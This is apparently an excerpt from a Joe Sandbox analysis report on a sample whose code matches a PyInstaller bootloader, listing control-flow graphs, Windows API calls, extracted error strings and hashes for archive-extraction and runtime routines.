                                                                                                                      • Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00F5133C
                                                                                                                      • Failed to extract %s: failed to seek to the entry's data!, xrefs: 00F51306
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                      • API String ID: 0-3659356012
                                                                                                                      • Opcode ID: e105c710dacc578b9eab87afd29fb1470a40d89bbb1de6cb1f786e4433316a98
                                                                                                                      • Instruction ID: df981358432b7b6d3fcdab9b1473859f20f81adb5b91decf0455604aad4387c6
                                                                                                                      • Opcode Fuzzy Hash: e105c710dacc578b9eab87afd29fb1470a40d89bbb1de6cb1f786e4433316a98
                                                                                                                      • Instruction Fuzzy Hash: 5A412B72E003116BEB14AF648C91B2B7798FF40766F048565FE049B642E775FA0CB293

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 387 f52f30-f52f77 call f59710 call f5e4d0 call f5efe0 call f51a60 396 f52f7d-f52f8e call f534a0 387->396 397 f530a8 387->397 396->397 403 f52f94-f52fab call f533a0 396->403 399 f530ab-f530c3 call f596fa 397->399 403->397 406 f52fb1-f52fc8 call f53430 403->406 406->397 409 f52fce-f52fea call f55c60 406->409 412 f52fec-f52ffd call f55c60 409->412 413 f5304f 409->413 412->413 419 f52fff-f53004 412->419 414 f53053-f5306e call f560c0 call f51970 413->414 425 f53074-f5308c call f51970 414->425 426 f53162-f53177 414->426 421 f53006-f5300a 419->421 423 f53026-f53028 421->423 424 f5300c-f5300e 421->424 429 f5302b-f5304d call f5e365 call f560c0 423->429 427 f53010-f53016 424->427 428 f53022-f53024 424->428 441 f530c4-f530c6 425->441 442 f5308e-f5309b 425->442 433 f5318d-f531a5 call f56990 426->433 434 f53179-f53184 call f52b40 426->434 427->423 431 f53018-f53020 427->431 428->429 429->414 431->421 431->428 448 f531a7-f531b4 call f52340 433->448 449 f531b9-f531c1 SetDllDirectoryW 433->449 445 f531c7-f531d2 call f55220 434->445 446 f53186 434->446 441->426 447 f530cc-f530e2 call f535c0 441->447 450 f530a0-f530a5 call f52340 442->450 461 f531d4-f531e1 call f54f80 445->461 462 f5322f-f53239 call f551c0 445->462 446->433 459 f530e4-f530f5 447->459 460 f530f7-f53126 call f562c0 447->460 448->397 449->445 450->397 459->450 471 f53149-f53160 460->471 472 f53128-f53144 call f5b65c 460->472 461->462 469 f531e3-f531f2 call f54bb0 461->469 470 f5323c-f5323e 462->470 481 f531f4-f53202 call f54b50 469->481 482 f53217-f5322d call f54dd0 call f551c0 469->482 474 f53244-f5324d 470->474 475 f532f0-f532ff call f52a50 470->475 471->434 472->450 478 f53250-f53254 474->478 475->397 491 f53305-f5333d call f56080 call f55c60 call f549e0 475->491 483 f53256-f53258 478->483 484 f53270-f53272 478->484 481->482 499 f53204-f53215 call f55100 481->499 482->470 487 f5326c-f5326e 483->487 488 f5325a-f53260 483->488 489 f53275-f53277 484->489 487->489 488->484 493 f53262-f5326a 488->493 494 f532bf-f532ce call f52b30 call f529f0 call f52b20 489->494 495 f53279-f53298 call f51a90 489->495 491->397 517 f53343-f5337d call f52b30 call f560f0 call f54dd0 call f551c0 491->517 493->478 493->487 518 f532d3-f532eb call f54dd0 call f551c0 494->518 495->397 511 f5329e-f532a8 495->511 499->470 514 f532b0-f532bd 511->514 514->494 514->514 531 f5337f-f53385 call f55ef0 517->531 532 f53388-f53393 call f51a20 517->532 518->399 531->532 532->399
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F534A0: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00F52F89,?,?), ref: 00F534CC
                                                                                                                      • SetDllDirectoryW.KERNEL32(?), ref: 00F531C1
                                                                                                                        • Part of subcall function 00F55C60: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55C96
                                                                                                                        • Part of subcall function 00F55C60: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55CB2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                      • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                      • API String ID: 2344891160-3602715111
                                                                                                                      • Opcode ID: 734a7e3a4ae3d4b4580960101363d7ce885150d757c2e64e8ff0aa277c0216fd
                                                                                                                      • Instruction ID: ed3398947a25329c485e641722581280a5255d89ddfcac71a0405a9ef43fc0bf
                                                                                                                      • Opcode Fuzzy Hash: 734a7e3a4ae3d4b4580960101363d7ce885150d757c2e64e8ff0aa277c0216fd
                                                                                                                      • Instruction Fuzzy Hash: 0EB13B72D087416BC711AA749C42BAF77DCAF5475AF040529FF8882142E769E70CB7A3

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 537 f51040-f51073 call f58590 540 f51075-f51093 call f52340 537->540 541 f51094-f510a7 call f5e380 537->541 546 f510a9-f510c3 call f521e0 541->546 547 f510c8-f510d9 call f5e380 541->547 554 f511f0-f51204 call f583d0 call f5e365 * 2 546->554 552 f510db-f510f5 call f521e0 547->552 553 f510fa-f51117 547->553 552->554 557 f51129 553->557 558 f51119 553->558 572 f51209-f51213 554->572 563 f5112b-f51138 call f5b91e 557->563 561 f51122-f51127 558->561 562 f5111b-f51120 558->562 561->563 562->557 562->561 567 f5113d-f51142 563->567 569 f51148-f51158 call f5b70c 567->569 570 f511eb 567->570 569->570 575 f5115e-f51197 call f56c00 569->575 571 f511ee-f511ef 570->571 571->554 578 f511a7-f511c3 call f5bf4f 575->578 579 f51199-f511a0 575->579 588 f511c5-f511d0 call f5b70c 578->588 589 f511d2 578->589 579->578 580 f51250-f51255 579->580 581 f5125a-f5125d 579->581 584 f511d5-f511e8 call f52340 580->584 581->584 585 f51263-f51265 581->585 584->570 585->571 588->589 589->584
                                                                                                                      Strings
                                                                                                                      • 1.2.11, xrefs: 00F5104D
                                                                                                                      • Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00F510B1
                                                                                                                      • Failed to extract %s: decompression resulted in return code %d!, xrefs: 00F511DE
                                                                                                                      • malloc, xrefs: 00F510B6, 00F510E8
                                                                                                                      • Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00F510E3
                                                                                                                      • Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00F5107E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1.2.11$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                      • API String ID: 0-1060636955
                                                                                                                      • Opcode ID: b83f119209401e4dc65f829dccba4ae24f1bec04eb59fdc36accf4d6ceb2c2c0
                                                                                                                      • Instruction ID: 7f51e05d369b6216dd8425dd802cdf752b2134067000c3176bb48a8794fd94db
                                                                                                                      • Opcode Fuzzy Hash: b83f119209401e4dc65f829dccba4ae24f1bec04eb59fdc36accf4d6ceb2c2c0
                                                                                                                      • Instruction Fuzzy Hash: 1B51F771D043005BD3109F689C82B5BBBE8BF45762F04096DFF48D6282E765EA0CA793

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 593 f670e9-f670f5 594 f6719c-f6719f 593->594 595 f671a5 594->595 596 f670fa-f6710b 594->596 599 f671a7-f671ab 595->599 597 f6710d-f67110 596->597 598 f67118-f67131 LoadLibraryExW 596->598 600 f67116 597->600 601 f67199 597->601 602 f67183-f6718c 598->602 603 f67133-f6713c GetLastError 598->603 604 f67195-f67197 600->604 601->594 602->604 605 f6718e-f6718f FreeLibrary 602->605 606 f67173 603->606 607 f6713e-f67150 call f6394d 603->607 604->601 608 f671ac-f671ae 604->608 605->604 610 f67175-f67177 606->610 607->606 613 f67152-f67164 call f6394d 607->613 608->599 610->602 612 f67179-f67181 610->612 612->601 613->606 616 f67166-f67171 LoadLibraryExW 613->616 616->610
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                      • API String ID: 0-537541572
                                                                                                                      • Opcode ID: a0932203a1c304cb69444c85e3e16df8b7be7887f7c26664a1fdd71369748fb6
                                                                                                                      • Instruction ID: 378f146946c2a4c7c8d676ad1a4221bf3766984b1555ba7ffe014a561a214a2b
                                                                                                                      • Opcode Fuzzy Hash: a0932203a1c304cb69444c85e3e16df8b7be7887f7c26664a1fdd71369748fb6
                                                                                                                      • Instruction Fuzzy Hash: E1210A32E09325BBDB22AB349C44B5A77599F437BCF250523ED09A7292D630DE01F6E1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 653 f63cca-f63cde call f60aa8 656 f63ce4-f63cec 653->656 657 f63ce0-f63ce2 653->657 659 f63cf7-f63cfa 656->659 660 f63cee-f63cf5 656->660 658 f63d32-f63d52 call f60a17 657->658 668 f63d54-f63d5e call f5e5e3 658->668 669 f63d60 658->669 663 f63cfc-f63d00 659->663 664 f63d18-f63d28 call f60aa8 CloseHandle 659->664 660->659 662 f63d02-f63d16 call f60aa8 * 2 660->662 662->657 662->664 663->662 663->664 664->657 672 f63d2a-f63d30 GetLastError 664->672 674 f63d62-f63d65 668->674 669->674 672->658
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00F63BF8,?,00F7F038,0000000C,00F63CAA,?,?,?), ref: 00F63D20
                                                                                                                      • GetLastError.KERNEL32(?,00F63BF8,?,00F7F038,0000000C,00F63CAA,?,?,?), ref: 00F63D2A
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F63D55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2583163307-0
                                                                                                                      • Opcode ID: cbeec3b724bd6bc1322411d6eb8fdfbf1c073c406e7141d9b3868d8ea3b7b297
                                                                                                                      • Instruction ID: 1675435a84074543a518818187f7684e68433e5bb0626e246cdd708320fd5a51
                                                                                                                      • Opcode Fuzzy Hash: cbeec3b724bd6bc1322411d6eb8fdfbf1c073c406e7141d9b3868d8ea3b7b297
                                                                                                                      • Instruction Fuzzy Hash: CD018E33F0026C1BC2205374DC06B7E77884F82774F38025DF818971C2DE698E817290

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 678 f64b46-f64b5e call f60aa8 681 f64b60-f64b65 call f5e619 678->681 682 f64b71-f64b87 SetFilePointerEx 678->682 688 f64b6b-f64b6f 681->688 683 f64b98-f64ba2 682->683 684 f64b89-f64b96 GetLastError call f5e5e3 682->684 687 f64ba4-f64bb9 683->687 683->688 684->688 691 f64bbe-f64bc1 687->691 688->691
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00F64BF3,00000000,00000000,00000002,00000000), ref: 00F64B7F
                                                                                                                      • GetLastError.KERNEL32(?,00F64BF3,00000000,00000000,00000002,00000000,?,00F656E7,00000000,00000000,00000000,00000002,00000000,00000000,00000000,?), ref: 00F64B89
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F64B90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2336955059-0
                                                                                                                      • Opcode ID: bb3a9f583bf9ebc3ca19c95d4aa6e6f5b1be245641caa32a89aacbf4ed7b3c77
                                                                                                                      • Instruction ID: ad79fd64dd8721ce693d9f515998a546d84c12524825a32f6cd3a6de087449d8
                                                                                                                      • Opcode Fuzzy Hash: bb3a9f583bf9ebc3ca19c95d4aa6e6f5b1be245641caa32a89aacbf4ed7b3c77
                                                                                                                      • Instruction Fuzzy Hash: DA01D833610518BBCB059B99DC45DAE3B29DBC5330B340248F952971D1EA74EE41B750

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 700 f5e7ed-f5e7f9 701 f5e818-f5e83c call f5a8f0 700->701 702 f5e7fb-f5e817 call f5e606 call f5e619 call f63b33 700->702 707 f5e83e-f5e858 call f5e606 call f5e619 call f63b33 701->707 708 f5e85a-f5e87c CreateFileW 701->708 732 f5e8c6-f5e8ca 707->732 711 f5e88c-f5e893 call f5e8cb 708->711 712 f5e87e-f5e88a call f5e955 708->712 723 f5e894-f5e896 711->723 712->723 725 f5e8b8-f5e8bb 723->725 726 f5e898-f5e8b5 call f5a8f0 723->726 728 f5e8c4 725->728 729 f5e8bd-f5e8be CloseHandle 725->729 726->725 728->732 729->728
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 743a8a1489fe49b5f73c151042bfa6c5f9fdb502205f960bb9f56359e76b3a77
                                                                                                                      • Instruction ID: d83dc877b67e1c5f115108f63999c206d2d7de3ed9e3405fb0ce5b1450cdb9ff
                                                                                                                      • Opcode Fuzzy Hash: 743a8a1489fe49b5f73c151042bfa6c5f9fdb502205f960bb9f56359e76b3a77
                                                                                                                      • Instruction Fuzzy Hash: A8210A32D00218BBEB156B689C46B9F37689F4237BF110361FE282B1D1D7745F0AB661

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 740 f615d8-f615e4 741 f615e6-f615fc call f5e619 call f63b33 740->741 742 f615fd-f61612 call f62f81 740->742 748 f61617-f6161d call f64bc2 742->748 749 f61614 742->749 752 f61622-f61631 748->752 749->748 753 f61633 752->753 754 f61641-f6164a 752->754 757 f61703-f61708 753->757 758 f61639-f6163b 753->758 755 f61660-f61693 754->755 756 f6164c-f6165b 754->756 760 f61695-f6169f 755->760 761 f616ea-f616f6 755->761 759 f61757-f6175b 756->759 757->759 758->754 758->757 762 f616c3-f616cf 760->762 763 f616a1-f616ad 760->763 764 f6170a 761->764 765 f616f8-f616fd call f5e619 761->765 762->764 768 f616d1-f616e8 call f61aab 762->768 763->762 767 f616af-f616be call f61915 763->767 766 f6170d-f61717 764->766 765->757 770 f6171d-f61723 766->770 771 f61719-f6171b 766->771 767->759 768->766 776 f61736-f6173a 770->776 777 f61725-f61734 call f6175c 770->777 775 f61755 771->775 775->759 781 f61751-f61753 776->781 782 f6173c-f6174f call f71e60 776->782 777->759 781->775 782->781
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9f6b945254909cfc76e1310d7d940492520b8a62310ebc3fcd86163cea8f9bd5
                                                                                                                      • Instruction ID: 66cdf32264a3599041b57c3d7030ed707ed2f402daca8f1a3faeac4a5d9ac512
                                                                                                                      • Opcode Fuzzy Hash: 9f6b945254909cfc76e1310d7d940492520b8a62310ebc3fcd86163cea8f9bd5
                                                                                                                      • Instruction Fuzzy Hash: 2B410375E00208AFDB14DF58CC81AA97BB2FB89364F2C8168F8499B351D771DE42EB50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2638373210-0
                                                                                                                      • Opcode ID: 5acec9a429ba90609930334b44af4e936b8faf020c2940179ccbef0e36a064b9
                                                                                                                      • Instruction ID: f97fec9e9f030ba093166362ebcd9374224453f0d446ef39276d318ccc1e00ff
                                                                                                                      • Opcode Fuzzy Hash: 5acec9a429ba90609930334b44af4e936b8faf020c2940179ccbef0e36a064b9
                                                                                                                      • Instruction Fuzzy Hash: D0410972E0470157D7208A288C4171BBB92AF9533AFA94724FEB4D33C5EB25EC8D5292
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cbdc0820e60ef6b5c02852c9838e6dbde2c219231d4c2634b3c3e2098b1b19d0
                                                                                                                      • Instruction ID: d33b6fc810dc9a0516b7e832264c5b719ef5d9e796f19fcaff3039d439cc8d82
                                                                                                                      • Opcode Fuzzy Hash: cbdc0820e60ef6b5c02852c9838e6dbde2c219231d4c2634b3c3e2098b1b19d0
                                                                                                                      • Instruction Fuzzy Hash: BD0128377083195F9F11AE6DED50AAB3396EBC53383248120FA14CB158EA30C801BB50
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wsopen_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3347428461-0
                                                                                                                      • Opcode ID: 2fe2e3197cdd298c95c29f29c8ab82eb04910d717c57a7ffdefd5c7d3e99af51
                                                                                                                      • Instruction ID: b47e434e2d21b111a8465f1b092a3887b98e016366cb9959fc3150357e01a7d9
                                                                                                                      • Opcode Fuzzy Hash: 2fe2e3197cdd298c95c29f29c8ab82eb04910d717c57a7ffdefd5c7d3e99af51
                                                                                                                      • Instruction Fuzzy Hash: A3115AB1A0010AAFCF05DF58E94199F7BF4EF48304F044069F804EB251DA30DA12DB64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
